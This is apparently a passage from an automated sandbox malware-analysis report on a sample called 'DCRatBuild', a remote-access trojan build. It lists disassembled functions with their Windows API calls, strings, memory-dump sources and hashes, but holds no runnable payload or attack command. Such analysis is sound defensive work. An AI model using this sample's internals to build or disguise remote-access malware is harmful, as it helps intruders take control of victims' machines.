                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00D6ABC5,00000008,?,00000000,?,00D6CB88,?,00000000), ref: 00D706FD
                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00D6ABC5,00000008,?,00000000,?,00D6CB88,?,00000000), ref: 00D7070D
                      Strings
                      • Thread pool initialization failed., xrefs: 00D70725
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                      • String ID: Thread pool initialization failed.
                      • API String ID: 3340455307-2182114853
                      • Opcode ID: 98b6fac6f54a0652bf594d0fb96127b475f47919d5a60bdea478eb88b03de314
                      • Instruction ID: b592857f458d8311fe9a424cd51cfc25125e59518591e8e0d7279fedf831e0aa
                      • Opcode Fuzzy Hash: 98b6fac6f54a0652bf594d0fb96127b475f47919d5a60bdea478eb88b03de314
                      • Instruction Fuzzy Hash: AC1170B1604708AFC3315F65D884AABFBECEB95755F10882EF1DEC2241E6716980CB70
                      Function 00D7D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: RENAMEDLG$REPLACEFILEDLG
                      • API String ID: 0-56093855
                      • Opcode ID: 54adc395e48b724537452bef394bc2d2584fd3b3c37ecbc3eea87ce19503f606
                      • Instruction ID: ab54eadc65e485df42ce906eda5c056096ffb4698984d2f2becacec77a154800
                      • Opcode Fuzzy Hash: 54adc395e48b724537452bef394bc2d2584fd3b3c37ecbc3eea87ce19503f606
                      • Instruction Fuzzy Hash: 5B017171A00346AFDB118F14ED44E663FBBEB09394B048426F809D2371EAB29C50FBB1
                      Function 00D891DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: __alldvrm$_strrchr
                      • String ID:
                      • API String ID: 1036877536-0
                      • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                      • Instruction ID: 7e0c2428ef87c740546b6bf498bad81070821bb2342262e1b88cee4cb146b3d5
                      • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                      • Instruction Fuzzy Hash: 59A14671A00386AFDB21EE68C8A17BEFBE5EF55310F1C41ADE4D59B281D2389942C774
                      Function 00D6A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00D680B7,?,?,?), ref: 00D6A351
                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00D680B7,?,?), ref: 00D6A395
                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00D680B7,?,?,?,?,?,?,?,?), ref: 00D6A416
                      • CloseHandle.KERNEL32(?,?,00000000,?,00D680B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00D6A41D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: File$Create$CloseHandleTime
                      • String ID:
                      • API String ID: 2287278272-0
                      • Opcode ID: a839a504798c24d563524e0958f8c0d858b653e89fdcafb2640ed739e008e607
                      • Instruction ID: 58d4c1bc05119cc39de60f45db3b7445b63ddf86754a29bfd007727e708debab
                      • Opcode Fuzzy Hash: a839a504798c24d563524e0958f8c0d858b653e89fdcafb2640ed739e008e607
                      • Instruction Fuzzy Hash: F341CE30288385ABD721DF68CC55BAABBE4AB85700F08091DF5D4E3291D6649A489B73
                      Function 00D8C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D889AD,?,00000000,?,00000001,?,?,00000001,00D889AD,?), ref: 00D8C0E6
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D8C16F
                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D867E2,?), ref: 00D8C181
                      • __freea.LIBCMT ref: 00D8C18A
                        • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                      • String ID:
                      • API String ID: 2652629310-0
                      • Opcode ID: 22bf0e72a197a24a927da453e15e6131a8c587d06ff08715faf5cf10e7001aeb
                      • Instruction ID: 537b78b37c3a9d15e4924ff2f4e9c273f845a2487c8fd294aa880641152d67f7
                      • Opcode Fuzzy Hash: 22bf0e72a197a24a927da453e15e6131a8c587d06ff08715faf5cf10e7001aeb
                      • Instruction Fuzzy Hash: E931CD72A2020AEBDB25AF65DC89DAE7BA5EB44710F084129FC04D7251EB35CD51CBB0
                      Function 00D82503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00D8251A
                        • Part of subcall function 00D82B52: ___AdjustPointer.LIBCMT ref: 00D82B9C
                      • _UnwindNestedFrames.LIBCMT ref: 00D82531
                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00D82543
                      • CallCatchBlock.LIBVCRUNTIME ref: 00D82567
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                      • String ID:
                      • API String ID: 2633735394-0
                      • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                      • Instruction ID: 088ea336e681ba1c2279f7a3bb37e01b2e6b9c496e1a32cf631283856ed16acb
                      • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                      • Instruction Fuzzy Hash: 49011332000108BBCF12AF65CD41EEE3BBAEF58710F058455F91866120D376E961EBB1
                      Function 00D79DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                      Download Yara Rule
                      APIs
                      • GetDC.USER32(00000000), ref: 00D79DBE
                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D79DCD
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D79DDB
                      • ReleaseDC.USER32(00000000,00000000), ref: 00D79DE9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CapsDevice$Release
                      • String ID:
                      • API String ID: 1035833867-0
                      • Opcode ID: 758b37ed5a42f6829ba7007cef1cd63096d78c139136fc7893f2d46b3b526397
                      • Instruction ID: 906613124b255d65a0b3dcdbacfa2afb192b9d9a792c3175416ac1f34aec1a16
                      • Opcode Fuzzy Hash: 758b37ed5a42f6829ba7007cef1cd63096d78c139136fc7893f2d46b3b526397
                      • Instruction Fuzzy Hash: 28E0EC31985723A7D3201BA4AC0DFAB7B55AB0E712F050016FA06D6390EAB44405EBB5
                      Function 00D82016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                      Download Yara Rule
                      APIs
                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00D82016
                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00D8201B
                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00D82020
                        • Part of subcall function 00D8310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00D8311F
                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00D82035
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                      • String ID:
                      • API String ID: 1761009282-0
                      • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                      • Instruction ID: 10be3bb8d72352ea7f73e1b7f4dab5134ceaee52e25cf0635e7e27711cc42216
                      • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                      • Instruction Fuzzy Hash: 5FC04834004744E41C223AF6221A6BE0B18CC62FCABA620C2ECC817107DE064B0BA337
                      Function 00D79F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D79DF1: GetDC.USER32(00000000), ref: 00D79DF5
                        • Part of subcall function 00D79DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D79E00
                        • Part of subcall function 00D79DF1: ReleaseDC.USER32(00000000,00000000), ref: 00D79E0B
                      • GetObjectW.GDI32(?,00000018,?), ref: 00D79F8D
                        • Part of subcall function 00D7A1E5: GetDC.USER32(00000000), ref: 00D7A1EE
                        • Part of subcall function 00D7A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00D7A21D
                        • Part of subcall function 00D7A1E5: ReleaseDC.USER32(00000000,?), ref: 00D7A2B5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ObjectRelease$CapsDevice
                      • String ID: (
                      • API String ID: 1061551593-3887548279
                      • Opcode ID: f61a0b5a1ea2de2ab9f7a9978f8638172219271a674ff4d6d99c6b22684a6bc3
                      • Instruction ID: 5446928c14c96c69127f3b6c736c4e2bc6b4a3a7a6b8e9c692a7900d91fc6298
                      • Opcode Fuzzy Hash: f61a0b5a1ea2de2ab9f7a9978f8638172219271a674ff4d6d99c6b22684a6bc3
                      • Instruction Fuzzy Hash: CD810171608315AFD714DF68D844A2ABBE9FFC8714F00891EF98AD7260DB31AD05DB62
                      Function 00D70E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _swprintf
                      • String ID: %ls$%s: %s
                      • API String ID: 589789837-2259941744
                      • Opcode ID: 46ac4c6538d805899dd7c0d68e6bd2b701b7adbd5f5c2fb5644d9e660cdd8606
                      • Instruction ID: 6e2075809308b1c545f46fd1641aeb19cab512bb7a854e6678df183597917a60
                      • Opcode Fuzzy Hash: 46ac4c6538d805899dd7c0d68e6bd2b701b7adbd5f5c2fb5644d9e660cdd8606
                      • Instruction Fuzzy Hash: E351B57568C700FEEB211AA8DD02F367E56EB04B00F24CA06F7DE648D5F692D5906A72
                      Function 00D8A918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 00D8AA84
                        • Part of subcall function 00D88849: IsProcessorFeaturePresent.KERNEL32(00000017,00D88838,00000050,00D93958,?,00D6CFE0,00000004,00DA0EE8,?,?,00D88845,00000000,00000000,00000000,00000000,00000000), ref: 00D8884B
                        • Part of subcall function 00D88849: GetCurrentProcess.KERNEL32(C0000417,00D93958,00000050,00DA0EE8), ref: 00D8886D
                        • Part of subcall function 00D88849: TerminateProcess.KERNEL32(00000000), ref: 00D88874
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                      • String ID: *?$.
                      • API String ID: 2667617558-3972193922
                      • Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                      • Instruction ID: 6cb59c88c5cf32cb922a38156c96d276faf25e8c2f1f4f10cab932f2977db109
                      • Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                      • Instruction Fuzzy Hash: 4D519371E0011AAFEF14EFACC981AADB7F5EF58310F29816AE554E7340E6319E01CB61
                      Function 00D6772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                      Download Yara Rule
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D67730
                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D678CC
                        • Part of subcall function 00D6A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A458
                        • Part of subcall function 00D6A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A489
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: File$Attributes$H_prologTime
                      • String ID: :
                      • API String ID: 1861295151-336475711
                      • Opcode ID: 64787562eadfc653f7c7528fd715a1298141ab30c3d203c37d21fc46b11d4783
                      • Instruction ID: 4d2c29a4925669468f646026119ca418b5b5d88335c80d4baa62ded68ab5d59e
                      • Opcode Fuzzy Hash: 64787562eadfc653f7c7528fd715a1298141ab30c3d203c37d21fc46b11d4783
                      • Instruction Fuzzy Hash: E3416F71804228ABEB24EB54DD55EEEB37CEF45304F00419AB649A3092EB745F88CF71
                      Function 00D6B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: UNC$\\?\
                      • API String ID: 0-253988292
                      • Opcode ID: 7eb958c4a422c68642043b462608f61d36f18372c6d481a4ea5b2c3964ed32cd
                      • Instruction ID: f50f0a2418415c0d1531ff3b92acdf39411770914d7b17022cc4595fe2c65fd2
                      • Opcode Fuzzy Hash: 7eb958c4a422c68642043b462608f61d36f18372c6d481a4ea5b2c3964ed32cd
                      • Instruction Fuzzy Hash: 12418B35840359ABCF20AF21DC41EAB7BADEF857A0B144067F854E7252E771DAD4CAB0
                      Function 00D78FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: Shell.Explorer$about:blank
                      • API String ID: 0-874089819
                      • Opcode ID: 73d08ea501fbeaeea30ea7a581823f133fe692c6efaabcb5259c3117638ef20d
                      • Instruction ID: d2897b3d06e79f17a61fad0c374c4b72522d2f8e8c643abddb10f09632667053
                      • Opcode Fuzzy Hash: 73d08ea501fbeaeea30ea7a581823f133fe692c6efaabcb5259c3117638ef20d
                      • Instruction Fuzzy Hash: 782165722143149FDB08DF64C8A592AB7A9FF44721B14C55EF94D8B286EB70EC01CB71
                      Function 00D6EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D6EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D6EB92
                        • Part of subcall function 00D6EB73: GetProcAddress.KERNEL32(00DA81C0,CryptUnprotectMemory), ref: 00D6EBA2
                      • GetCurrentProcessId.KERNEL32(?,?,?,00D6EBEC), ref: 00D6EC84
                      Strings
                      • CryptUnprotectMemory failed, xrefs: 00D6EC7C
                      • CryptProtectMemory failed, xrefs: 00D6EC3B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AddressProc$CurrentProcess
                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                      • API String ID: 2190909847-396321323
                      • Opcode ID: f6a909a268a75908105bb5cb10b035a7aa7c28fc1afb258bdbda52f3a6023cd4
                      • Instruction ID: 2d2ec11a583f590bb7b8e8bd3ba174106ec54a7302edeec46a3157fa5f871c92
                      • Opcode Fuzzy Hash: f6a909a268a75908105bb5cb10b035a7aa7c28fc1afb258bdbda52f3a6023cd4
                      • Instruction Fuzzy Hash: 71115B35A04324AFDB159F39DC06A6E3B54EF01720B0A811AFC05AB395DB35AE4197F4
                      Function 00D70889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateThread.KERNEL32(00000000,00010000,00D709D0,?,00000000,00000000), ref: 00D708AD
                      • SetThreadPriority.KERNEL32(?,00000000), ref: 00D708F4
                        • Part of subcall function 00D66E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D66EAF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
